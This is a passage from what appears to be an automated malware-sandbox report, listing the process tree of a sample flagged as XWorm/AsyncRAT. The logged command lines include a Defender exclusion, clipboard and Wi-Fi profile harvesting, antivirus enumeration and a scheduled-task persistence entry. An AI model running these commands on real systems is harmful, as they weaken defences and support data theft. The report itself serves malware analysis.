                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                              Start time:13:01:12
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                              Start time:13:01:12
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                              Start time:13:01:13
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                              Start time:13:01:13
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                              Start time:13:01:13
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                              Start time:13:01:13
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                              Start time:13:01:14
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                              Start time:13:01:14
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                              Start time:13:01:14
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                              Start time:13:01:14
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                              Start time:13:01:14
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                              Imagebase:0x7ff7d0a10000
                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                              Start time:13:01:14
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                              Imagebase:0x7ff7d0a10000
                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                              Start time:13:01:14
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                              Imagebase:0x7ff753a70000
                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                              Start time:13:01:14
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                              Start time:13:01:17
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                              Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                              Start time:13:01:17
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe"
                                                                                                                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                                                                                                                              File size:235'008 bytes
                                                                                                                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                              Start time:13:01:17
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                                              Start time:13:01:18
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                                              Start time:13:01:18
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                                              Start time:13:01:18
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                                              Start time:13:01:18
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                                              Start time:13:01:18
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:40
                                                                                                                                                                                                                              Start time:13:01:18
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:41
                                                                                                                                                                                                                              Start time:13:01:18
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:42
                                                                                                                                                                                                                              Start time:13:01:18
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                              Imagebase:0x7ff7d0a10000
                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:43
                                                                                                                                                                                                                              Start time:13:01:18
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                              Imagebase:0x7ff715bf0000
                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:44
                                                                                                                                                                                                                              Start time:13:01:18
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:netsh wlan show profile
                                                                                                                                                                                                                              Imagebase:0x7ff628ea0000
                                                                                                                                                                                                                              File size:96'768 bytes
                                                                                                                                                                                                                              MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:45
                                                                                                                                                                                                                              Start time:13:01:18
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:46
                                                                                                                                                                                                                              Start time:13:01:19
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:systeminfo
                                                                                                                                                                                                                              Imagebase:0x7ff743c80000
                                                                                                                                                                                                                              File size:110'080 bytes
                                                                                                                                                                                                                              MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:47
                                                                                                                                                                                                                              Start time:13:01:19
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\word.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\word.exe
                                                                                                                                                                                                                              Imagebase:0xd10000
                                                                                                                                                                                                                              File size:68'096 bytes
                                                                                                                                                                                                                              MD5 hash:8D8BC4B4831CCCE11284D512630749C5
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\word.exe, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\word.exe, Author: Joe Security
                                                                                                                                                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\word.exe, Author: ditekSHen
                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                              • Detection: 84%, ReversingLabs
                                                                                                                                                                                                                              • Detection: 80%, Virustotal, Browse
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:48
                                                                                                                                                                                                                              Start time:13:01:20
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 